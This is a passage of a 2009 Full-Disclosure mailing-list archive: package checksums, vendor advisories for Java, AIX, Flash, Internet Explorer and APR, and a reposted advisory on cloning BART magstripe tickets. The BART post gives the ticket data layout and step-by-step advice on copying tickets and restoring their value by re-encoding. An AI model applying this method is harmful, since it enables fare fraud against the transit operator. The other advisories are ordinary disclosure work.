993bbe82ab56638f8d28de33c3e84e60 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad-dbg_0.10.7-2+lenny2_alpha.deb Size/MD5 checksum: 2111010 ea7a055d2912c5afa67d45e72bb9afa2 http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad_0.10.7-2+lenny2_alpha.deb Size/MD5 checksum: 1048354 d8ecfb3959ed118861fb05b7d21ade95 http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-sdl_0.10.7-2+lenny2_alpha.deb Size/MD5 checksum: 36434 b7cf04f6a619e7592b4062c0ed72aecb amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad_0.10.7-2+lenny2_amd64.deb Size/MD5 checksum: 957244 b3dacf7e4d6e03a4dd6f40f160ff4ad0 http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad-dbg_0.10.7-2+lenny2_amd64.deb Size/MD5 checksum: 2163706 65925094be7f7a85cca230657ba5581f http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-sdl_0.10.7-2+lenny2_amd64.deb Size/MD5 checksum: 36368 98dc00b2f470b30542c7f19a25bb511b arm architecture (ARM) http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad-dbg_0.10.7-2+lenny2_arm.deb Size/MD5 checksum: 2101014 372bbc29b2ac8fa59081a73646239c9a http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad_0.10.7-2+lenny2_arm.deb Size/MD5 checksum: 966156 d225ffc908e13dc766c26204e40b90a4 http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-sdl_0.10.7-2+lenny2_arm.deb Size/MD5 checksum: 35424 a6faac34b9f077a8ea3b18e9c7e9cf21 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad_0.10.7-2+lenny2_armel.deb Size/MD5 checksum: 996812 097665fa1c957334834081224afb534e http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad-dbg_0.10.7-2+lenny2_armel.deb Size/MD5 checksum: 2115406 9908d02478311aa8ae3c259bd5bf95c2 http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-sdl_0.10.7-2+lenny2_armel.deb Size/MD5 checksum: 37034 c18b40f4ab57952ffcf38b816fe51013 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad_0.10.7-2+lenny2_hppa.deb Size/MD5 checksum: 1151850 f2ea3a40209d9efbb08cf7d96c392661 http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad-dbg_0.10.7-2+lenny2_hppa.deb Size/MD5 checksum: 2114420 a3e00e55001417ed8bd5ee3db723c109 http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-sdl_0.10.7-2+lenny2_hppa.deb Size/MD5 checksum: 38080 983bb56ad3eb1d1701c41960251109a5 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-sdl_0.10.7-2+lenny2_i386.deb Size/MD5 checksum: 35022 5dbee86cb284bfa9ffbd1a2e1ec6c56b http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad_0.10.7-2+lenny2_i386.deb Size/MD5 checksum: 920350 fe6bb25cbba77e82eaa961ee1ed6aee4 http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad-dbg_0.10.7-2+lenny2_i386.deb Size/MD5 checksum: 2120494 107c239d5282bf31a7de245735a3e60d ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-sdl_0.10.7-2+lenny2_ia64.deb Size/MD5 checksum: 42028 948d1a7e862a235b5a3219aa07bc98c5 http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad-dbg_0.10.7-2+lenny2_ia64.deb Size/MD5 checksum: 2120130 98994e0c1c4459aa83ab1d3244ebaf1d http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad_0.10.7-2+lenny2_ia64.deb Size/MD5 checksum: 1350174 d64e9b26874f54a40f5a577efdaf15ec mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad-dbg_0.10.7-2+lenny2_mips.deb Size/MD5 checksum: 2152052 5df3ef4605504278e1443e24b8429ebe http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad_0.10.7-2+lenny2_mips.deb Size/MD5 checksum: 959788 50352fe50b1f56546fddb512e0746c94 http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-sdl_0.10.7-2+lenny2_mips.deb Size/MD5 checksum: 34910 5a95e6e67e6422b748a256f54bc3c761 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad_0.10.7-2+lenny2_mipsel.deb Size/MD5 checksum: 957172 61d12e9a0d414d2bab4db57e7def22b6 http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-sdl_0.10.7-2+lenny2_mipsel.deb Size/MD5 checksum: 34950 5d8a6257fc723d30f24a4542b6d9f39c http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad-dbg_0.10.7-2+lenny2_mipsel.deb Size/MD5 checksum: 2133700 a44e908f6ba85e17c51cf9b47dc9be94 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad_0.10.7-2+lenny2_powerpc.deb Size/MD5 checksum: 1009876 38422a2a0824f67d3388d162ef66107e http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-sdl_0.10.7-2+lenny2_powerpc.deb Size/MD5 checksum: 36034 9f63352371601e3c0432306596d7fc09 http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad-dbg_0.10.7-2+lenny2_powerpc.deb Size/MD5 checksum: 2184376 584e33456003ac1f699ecb5e0854043a s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad-dbg_0.10.7-2+lenny2_s390.deb Size/MD5 checksum: 2138782 41a06d5f7f9c90789f962363e15f40ca http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-sdl_0.10.7-2+lenny2_s390.deb Size/MD5 checksum: 36698 0f065499efe141465c74a0acdd09b579 http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad_0.10.7-2+lenny2_s390.deb Size/MD5 checksum: 1033842 366259dc415ea0f1ae1bf91cefbf4b20 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-sdl_0.10.7-2+lenny2_sparc.deb Size/MD5 checksum: 34454 e22802f4794382a301f53509eb19d624 http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad_0.10.7-2+lenny2_sparc.deb Size/MD5 checksum: 930158 99106b5caf2b63ae230c547d9123fe67 http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad-dbg_0.10.7-2+lenny2_sparc.deb Size/MD5 checksum: 2003074 592d1ba09fb1ef3e83c08541095dc04c These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkp6kOwACgkQ62zWxYk/rQcyawCeJEbMEwmN53dQWRHXt6N3f59c BaYAoKC6L4snA0LbIrojeRTtx9gnJ8bO =SPvj -----END PGP SIGNATURE----- From thor at hammerofgod.com Thu Aug 6 19:13:03 2009 From: thor at hammerofgod.com (Thor (Hammer of God)) Date: Thu, 6 Aug 2009 15:13:03 -0300 Subject: [Full-disclosure] BART Card Advisory In-Reply-To: <7C9F6D0C66A946DDAABA6423548BACF0@ionicoffice.ionic.co.uk> References: <20090805162411.7419EB805A@smtp.hushmail.com> <7C9F6D0C66A946DDAABA6423548BACF0@ionicoffice.ionic.co.uk> Message-ID: <54B0B7ACDC1422469902A6D39654DEEE016566F519FC@gandalf.optimum.bm> Ewe. London Oysters. Reminds me of the time I hung out with Kev Dunn when he had a sinus infection. t -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Michal Sent: Thursday, August 06, 2009 1:14 AM To: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] BART Card Advisory Is this...a shit version of the London Oyster Card? -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of noisebridge at hushmail.com Sent: 05 August 2009 17:24 To: full-disclosure at lists.grok.org.uk Subject: [Full-disclosure] BART Card Advisory www.noisebridge.net -= Security Advisory =- Advisory: BART Tickets vulnerable to simple cloning Release Date: 2008/07/14 Author: Jacob Appelbaum Application: Bay Area Rapid Transit System (BART) Severity: All BART blue high-value tickets magstripe encoded tickets are vulnerable to cloning. Risk: Medium/High Vendor Status: Vendor has not been contacted "If you only read the books that everyone else is reading, you can only think what everyone else is thinking." -- Haruki Murakami Overview: Quote from www.bart.gov/tickets/ BART tickets are like debit cards with stored value. All BART stations have automatic ticket vending machines that accept nickels, dimes, quarters and $1 coins, as well as $1 $5, $10 and $20 bills. You can also use credit and debit cards in select machines. When you enter BART, insert your ticket into the fare gate and it will be returned to you. Use the same ticket when you exit. The correct fare will be automatically deducted and tickets with remaining value will be returned. If your ticket has too little value, a sign on the fare gate will read "Underpaid: Go to Addfare." A nearby Addfare vending machine will tell you how much additional fare you must add to your ticket to exit the BART system. It turns out that BART high value (blue) tickets and other magstripe BART tickets store value ON TICKET, as opposed to centrally via an authentication token. Critical information is stored directly on card using what is probably a simple block cipher and is vulnerable to a basic replay attack. In our analysis though, we have found that just like the SFMTA parking meter smartcard system, the signature goes UNVALIDATED. It seems theres a pattern here in the security systems of San Francisco public services! Hmmmm. This type of vulnerability does not extend to the new BART EZ Rider smart cards. (Applause) Track 2 Layout | SS | PAN | FS | Additional Data | ES | LRC | SS=Start Sentinel ";" PAN=Primary Acct. # (19 digits max) FS=Field Separator "=" Additional Data=Expiration Date, offset, encrypted PIN, etc. ES=End Sentinel "?" LRC=Longitudinal Redundancy Check In the ABA Track 2 system, the magic happens in the "Additional Data" area. Depending on bank (some remained completely unencrypted until mid 2000s!) the PIN numbers were actually stored on card only encrypted by a simple block cipher! Well it turns out the BART ticketing system, although not similar in format, does use the same general encoding format, 75bpi BCD which means you can take your standard off-the-shelf MSR-206 magstripe encoder/decoder and go! Fortunately for you, we've even provided this handy utility! http://code.google.com/p/libmsr/ This project is an independent Free Software implementation of the protocol for the MSR 206 magnetic stripe reader/writer. It is intended to be both a library for use in other programs that wish to interface with the MSR 206 and as a collection of useful user space programs. So onto the data. Bart Card Layout: | SET | VERSION | ID | DATA | VALUE | CRC | . set(?) . card id .- plain text value / / / 084909 5346 00721486 8432187913029 00405 1610 084909 5346 00721486 2072730117332 00065 2287 \ \ \ - version(?) \ `- CRC(?) `- data Set: Seems to be related to the ID but changes infrequently and doesnt seem to increment linearly. Version: This number seems to change infrequently but from time to time even for the same type of card (blue/red/green) ID: Card ID, which seems to be issued semi-sequentially Data: Most likely the encrypted version of value Value: Dollar value ($000.00) CRC: Possibly the checksum Although, as you can see, a plain-text BCD card value is stored on the stripe it is not the only data used to determine the on-card value. By our simple analysis (i.e. trying to encode other dollar figures in plaintext) It's clear that the plain text value in conjunction with the data field is used to validate the on-card value. We assume that the 4-digit value after the plain text value is the CRC, because this also changes each time its used, it's kinda small and it just seems like one (great evidence, huh!). In truth black-box differntial analysis of the magstripe data is relatively uninformational, but it turns out if we follow these this simple rule, we can effectively clone and use BART cards without any real brains. Don't use two clones of the same card at the same time. Anyone whos tried using a Fast Pass twice will realize they will be let in twice, but not let out twice. You'll end up stuck. Other than than, just copy the card and once in a while, reset the data back to a higher value by re-encoding a previous state. Anyways, if anyone wants to come join us at Noisebridge to clone some BART cards for fun and profit just swing by 83C Wiese Street with your extra cards (you know, the ones with a nickle on them). Also, if you would like to donate to the Noisebridge cause (and now an official 501(c)(3) non-profit corporation) we might be able to throw in a BART pass at twice the donation value! Just kidding, but hey, they're definately tax deductable and for a good cause ;) Regards, Jacob Appelbaum _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From labs-no-reply at idefense.com Thu Aug 6 20:19:26 2009 From: labs-no-reply at idefense.com (iDefense Labs) Date: Thu, 06 Aug 2009 14:19:26 -0500 Subject: [Full-disclosure] iDefense Security Advisory 08.06.09: Sun Java Runtime Environment (JRE) Pack200 Decompression Integer Overflow Vulnerability Message-ID: <4A7B2CBE.2040906@idefense.com> iDefense Security Advisory 08.04.09 http://labs.idefense.com/intelligence/vulnerabilities/ Aug 04, 2009 I. BACKGROUND Pack200 is a compression method introduced by Sun in the 1.5 release of the JRE. It is used to compress JAR files, and is optimized for the compression of Java class files. A Java applet can be compressed using the pack200 tool, and if the browser plug-in supports the pack200-gzip encoding it will pass the compressed JAR file to the JRE for unpacking. For more information, see the vendor's site at the following links. http://www.sun.com/java/ http://java.sun.com/j2se/1.5.0/docs/guide/deployment/deployment-guide/pack200.html II. DESCRIPTION Remote exploitation of an integer overflow vulnerability in Sun Microsystems Inc.'s Java Runtime Environment (JRE) could allow an attacker to execute arbitrary code with the privileges of the current user. The vulnerability occurs when reading the header of the Pack200 compressed Jar file during decompression. To calculate the size of a heap buffer, the code multiplies and adds several 32-bit integers. The bounds of these values are not checked, and the arithmetic operations can overflow. This results in an undersized buffer being allocated, which leads to a heap-based buffer overflow. This vulnerability is similar to two previous iDefense Exclusives in the JRE Pack200 code and is due to an incomplete fix of the previous vulnerabilities. III. ANALYSIS Exploitation allows attackers to execute arbitrary code in the context of the currently logged-on user. To exploit this vulnerability, a targeted user must load a malicious Web page created by an attacker. An attacker typically accomplishes this via social engineering or injecting content into compromised, trusted sites. IV. DETECTION iDefense has confirmed the existence of this vulnerability in Sun Microsystems Inc.'s JRE version 1.6.0_13 for Windows and Linux. This vulnerability is different than the two previously reported iDefense Exclusives in the Pack200 code. V. WORKAROUND The library containing the vulnerability can be renamed, which will prevent it from being loaded. This workaround will prevent users from loading Pack200 format JAR files and from using the pack/unpack tools that come with the JRE; however, normal applets and Java applications will continue to function correctly. The vulnerable library is called "unpack" and can be found in: "%SYSTEMDRIVE%\Program Files\Java\JAVA VERSION\bin\unpack.dll" on Windows and in differing locations, dependent upon the distribution/platform on Unix systems. VI. VENDOR RESPONSE Sun Microsystems Inc. has released a patch which addresses this issue. For more information, consult their advisory at the following URL: http://sunsolve.sun.com/search/document.do?assetkey=1-66-263488-1 VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 04/09/2009 - Initial Contact 04/13/2009 - PoC Requested 04/13/2009 - Clarification Requested 04/13/2009 - PoC Sent 04/21/2009 - Clarification Sent 07/22/2009 - Tentative Disclosure set for July 27, 2009 07/22/2009 - Requested CVE 07/22/2009 - Sun delays disclosures 07/28/2009 - Tentative Disclosure set for August 3rd, 2009 08/04/2009 - Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by regenrecht. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2009 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From security at mandriva.com Thu Aug 6 20:32:01 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 06 Aug 2009 21:32:01 +0200 Subject: [Full-disclosure] [ MDVSA-2009:195-1 ] apr Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:195-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : apr Date : August 6, 2009 Affected: Enterprise Server 5.0 _______________________________________________________________________ Problem Description: A vulnerability has been identified and corrected in apr and apr-util: Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR; or crafted calls to the (3) apr_rmm_malloc, (4) apr_rmm_calloc, or (5) apr_rmm_realloc function in misc/apr_rmm.c in APR-util; leading to buffer overflows. NOTE: some of these details are obtained from third party information (CVE-2009-2412). This update provides fixes for these vulnerabilities. Update: apr-util packages were missing for Mandriva Enterprise Server 5 i586, this has been adressed with this update. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2412 _______________________________________________________________________ Updated Packages: Mandriva Enterprise Server 5: 19ed152f311aaa740e498d204e611c87 mes5/i586/apr-util-dbd-freetds-1.3.4-2.3mdvmes5.i586.rpm 1da16e622bc2aa6fac28b0a9a7c36b39 mes5/i586/apr-util-dbd-ldap-1.3.4-2.3mdvmes5.i586.rpm e9e56ac0cbd4316b1687c3e5bf66d3d3 mes5/i586/apr-util-dbd-mysql-1.3.4-2.3mdvmes5.i586.rpm fbfaeb1772eb0b22de4b4562f5601c50 mes5/i586/apr-util-dbd-odbc-1.3.4-2.3mdvmes5.i586.rpm 6da57cdbe02238048ea6dc115a1ae744 mes5/i586/apr-util-dbd-pgsql-1.3.4-2.3mdvmes5.i586.rpm 34beee246bc1206229975aba75776aa2 mes5/i586/apr-util-dbd-sqlite3-1.3.4-2.3mdvmes5.i586.rpm 445b930503e3e8f15b220681e67c74b4 mes5/i586/libapr-util1-1.3.4-2.3mdvmes5.i586.rpm b53ec99a1242f3d0e31e4267090d4d69 mes5/i586/libapr-util-devel-1.3.4-2.3mdvmes5.i586.rpm ddd3ba83c0f4f0a73954d1ca8b6926c4 mes5/SRPMS/apr-util-1.3.4-2.3mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: 02e1b437a1451b205d726a804ecba70a mes5/x86_64/apr-util-dbd-freetds-1.3.4-2.3mdvmes5.x86_64.rpm daa72432fd3545df890a2aa2ebeacc4e mes5/x86_64/apr-util-dbd-ldap-1.3.4-2.3mdvmes5.x86_64.rpm 5c6b4a74cf6df907a88d1474708ba96c mes5/x86_64/apr-util-dbd-mysql-1.3.4-2.3mdvmes5.x86_64.rpm 8cabe517448ab264870e9b786f58db88 mes5/x86_64/apr-util-dbd-odbc-1.3.4-2.3mdvmes5.x86_64.rpm 4f49787251d7fac85d39535c82389a6a mes5/x86_64/apr-util-dbd-pgsql-1.3.4-2.3mdvmes5.x86_64.rpm 43c974a3636fd725d100332fd0b4f204 mes5/x86_64/apr-util-dbd-sqlite3-1.3.4-2.3mdvmes5.x86_64.rpm 9f0a37e6b63384f216033c6f35975c09 mes5/x86_64/lib64apr-util1-1.3.4-2.3mdvmes5.x86_64.rpm 99d7a7418d4250764773f6cbcc0ebd6c mes5/x86_64/lib64apr-util-devel-1.3.4-2.3mdvmes5.x86_64.rpm ddd3ba83c0f4f0a73954d1ca8b6926c4 mes5/SRPMS/apr-util-1.3.4-2.3mdvmes5.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKewWNmqjQ0CJFipgRAl3dAKCBpW6Ccamts0gKMNkDopc+x+QCZACfZ+Ep WrkXUeLyvhHymK2bJ8xLrXU= =4/ly -----END PGP SIGNATURE----- From labs-no-reply at idefense.com Thu Aug 6 20:38:13 2009 From: labs-no-reply at idefense.com (iDefense Labs) Date: Thu, 06 Aug 2009 14:38:13 -0500 Subject: [Full-disclosure] iDefense Security Advisory 08.06.09: IBM AIX libC _LIB_INIT_DBG Arbitrary File Creation Vulnerability Message-ID: <4A7B3125.8050803@idefense.com> iDefense Security Advisory 08.04.09 http://labs.idefense.com/intelligence/vulnerabilities/ Aug 04, 2009 I. BACKGROUND IBM's AIX is a Unix operating system based on System V, which runs on the PowerPC (PPC) architecture. For more information, visit the product web site at the following URL. http://www.ibm.com/systems/power/software/aix/index.html II. DESCRIPTION Local exploitation of an arbitrary file creation vulnerability in IBM Corp.'s Advanced Interactive eXecutive (AIX) Operating System allows attackers to execute arbitrary code with super-user privileges. This vulnerability exists due to the handling of several environment variables. The libC.a library will open files as specified by the "_LIB_INIT_DBG" and "_LIB_INIT_DBG_FILE" variables. The attacker's "umask" will be honored, allowing them to create world-writable files, owned by root, in arbitrary locations on the system. III. ANALYSIS Exploitation of this vulnerability allows attackers to execute arbitrary code with super-user privileges. In order to exploit this vulnerability an attacker must be able to execute a set-uid binary linked with the "libC.a" library. In default installations, several binaries may be executed by any user with a local account; no special group membership is needed. IV. DETECTION iDefense has confirmed the existence of this vulnerability in IBM Corp.'s AIX version 5.3. Other versions may also be affected. V. WORKAROUND iDefense is currently unaware of any effective workaround for this issue. VI. VENDOR RESPONSE IBM has released a patch which addresses this issue. For more information, consult their advisory at the following URL: http://aix.software.ibm.com/aix/efixes/security/libC_advisory.asc VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 02/25/2009 - Initial Contact 03/03/2009 - Initial Response 08/04/2009 - IBM proposed release date of August 4th, 2009 08/04/2009 - Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Karol Wiesek. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2009 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From martinbogo at gmail.com Thu Aug 6 20:38:36 2009 From: martinbogo at gmail.com (Martin Bogomolni) Date: Thu, 6 Aug 2009 14:38:36 -0500 Subject: [Full-disclosure] BART Card Advisory Message-ID: <712fce10908061238o5ad285fcwb197ebdd29945e0@mail.gmail.com> Hmm .. that "advisory" doesn't come from Jake. The posting lacks Jake's PGP key armor, plus it was posted on full-disclosure rather than on any of the main lists. That, and Noisebridge isn't a place for fraud. Hacking and presentations, yeah, but cloning and fraud? Not a snowballs chance in the sun's corona. From labs-no-reply at idefense.com Thu Aug 6 20:57:15 2009 From: labs-no-reply at idefense.com (iDefense Labs) Date: Thu, 06 Aug 2009 14:57:15 -0500 Subject: [Full-disclosure] iDefense Security Advisory 08.06.09: Adobe Flash Player URL Parsing Heap Overflow Vulnerability Message-ID: <4A7B359B.6000305@idefense.com> iDefense Security Advisory 08.06.09 http://labs.idefense.com/intelligence/vulnerabilities/ Aug 06, 2009 I. BACKGROUND Adobe Flash Player is Flash Player is a cross-platform browser plug-in that delivers interactive content for Web experiences. For more information, please visit following page: http://www.adobe.com/products/flashplayer/ II. DESCRIPTION Remote exploitation of a heap overflow vulnerability in Adobe Systems Inc's Flash Player could allow an attacker to execute arbitrary code with the privileges of the current user. When a specifically crafted URL is passed to Flash Player, a heap overflow can occur and could result in arbitrary code execution. III. ANALYSIS Exploitation of this vulnerability allows the attacker to execute arbitrary code with the privileges of the current user. To exploit this vulnerability, a targeted user must load a malicious Web page created by an attacker. An attacker typically accomplishes this via social engineering techniques or injecting content into compromised, trusted sites. IV. DETECTION iDefense confirmed the existence of this vulnerability in Flash Player 10.0.22.87. Other versions may also be affected. V. WORKAROUND iDefense is unaware of any effective workaround for this vulnerability. VI. VENDOR RESPONSE Adobe has released an update which addresses this issue. For more information, consult their advisory (APSB09-10) at the following URL: http://www.adobe.com/support/security/bulletins/apsb09-10.html VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2009-1868 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 04/09/2009 - Initial Contact 04/09/2009 - PoC Requested 04/09/2009 - PoC Sent 07/30/2009 - Adobe releases update for Flash 08/05/2009 - iDefense requests clarification 08/06/2009 - Adobe clarifies fixed issue 08/06/2009 - Public disclosure IX. CREDIT This vulnerability was discovered by Jun Mao, iDefense Labs Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2009 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From labs-no-reply at idefense.com Thu Aug 6 22:06:00 2009 From: labs-no-reply at idefense.com (iDefense Labs) Date: Thu, 06 Aug 2009 17:06:00 -0400 Subject: [Full-disclosure] iDefense Security Advisory 08.06.09: Microsoft Internet Explorer HTML TIME 'ondatasetcomplete' Use After Free Vulnerability Message-ID: <4A7B45B8.5090003@idefense.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 iDefense Security Advisory 07.28.09 http://labs.idefense.com/intelligence/vulnerabilities/ Jul 28, 2009 I. BACKGROUND HTML+TIME (HTML Timed Interactive Multimedia Extensions)is a web standard that was created for Microsoft Corp.'s Internet Explorer (IE) to allow web page authors to create timed animation content on a web page. This is accomplished using an XML like markup that makes use of HTML+TIME properties and elements. Internet Explorer supports this markup standard, and also exposes a scripting interface for interacting with the HTML+TIME elements on the page. For more information, please see the vendor's web page at the following link: http://technet.microsoft.com/en-us/library/ms533099(VS.85).aspx II. DESCRIPTION Remote exploitation of a use after free vulnerability in Microsoft Corp.'s Internet Explorer could allow an attacker to execute arbitrary code with the privileges of the current user. The vulnerability occurs when the 'ondatasetcomplete' event method of a timeChildren object is referenced. If this occurs when the object is in an inconsistent state, a heap chunk will be freed, and then reused after being freed. This results in an uninitialized VTABLE being used, which can result in the execution of arbitrary code when the pointer is dereferenced. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the user viewing the web page. To exploit this vulnerability, a targeted user must load a malicious web page created by an attacker. An attacker typically accomplishes this via social engineering or injecting content into compromised, trusted sites. After the user visits the malicious web page, no further user interaction is needed. IV. DETECTION iDefense has confirmed the existence of this vulnerability in Internet Explorer versions 6, 7, and 8. Internet Explorer 5 does not appear to be vulnerable. V. WORKAROUND Since this vulnerability is triggered through script code, disabling Active Scripting will prevent the exploitation of this vulnerability. VI. VENDOR RESPONSE Microsoft Corp. has released an Out-Of-Band patch which addresses this issue. Information about downloadable vendor updates can be found by clicking on the URLs shown. http://www.microsoft.com/technet/security/Bulletin/MS09-034.mspx VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2009-1917 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 05/06/2009 - PoC Requested 06/06/2009 - PoC Sent 06/24/2009 - Tentative disclosure set to August 06/25/2009 - Requested CVE from vendor 06/25/2009 - Received CVE from vendor 07/23/2009 - Received updated disclosure notice for OOB in July 07/28/2009 - Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Peter Vreugdenhil. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES 